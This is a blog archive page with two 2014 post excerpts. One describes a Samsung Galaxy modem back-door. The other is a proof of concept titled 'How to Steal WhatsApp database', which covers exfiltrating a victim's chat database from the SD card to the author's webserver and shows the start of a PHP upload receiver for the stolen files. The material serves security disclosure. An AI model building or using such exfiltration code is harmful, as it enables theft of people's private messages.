Skip to main content

Posts

Showing posts from March, 2014

SamsungGalaxyBackdoor

This page contains a technical description of the back-door found in Samsung Galaxy devices. For a general description of the issue, please refer to the  statement published on the Free Software Foundation's website . This back-door is present in most proprietary Android systems running on the affected Samsung Galaxy devices, including the ones that are shipped with the devices. However, when Replicant is installed on the device, this back-door is not effective: Replicant does not cooperate with back-doors. Abstract Samsung Galaxy devices running proprietary Android versions come with a back-door that provides remote access to the data stored on the device. In particular, the proprietary software that is in charge of handling the communications with the modem, using the Samsung IPC protocol, implements a class of requests known as RFS commands, that allows the modem to perform remote I/O operations on the phone's storage. As the modem is running proprietary software, it is like...

How to Steal WhatsApp database

"Is it possible to upload and read the WhatsApp chats from another Android application?" With this question my  brother  and I started an interesting conversation which ended in underneath proof of concept. The tldr answer is: "Yes, that is possible". The  WhatsApp  database is saved on the SD card which can be read by any Android application if the user allows it to access the SD card. And since majority of the people allows everything on their Android device, this is not much of a problem. So what do we need to steal someones Whatsapp database? First we need a place to store the database. I used this  webserver  with a simple php script. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24   <?php // Upload script to upload Whatsapp database // This script is for testing purposes only.   $uploaddir = "/tmp/whatsapp/" ;   if ( $_FILES [ "file" ] [ "error" ] > 0 )    {    echo "Error: " . $_FILES [ ...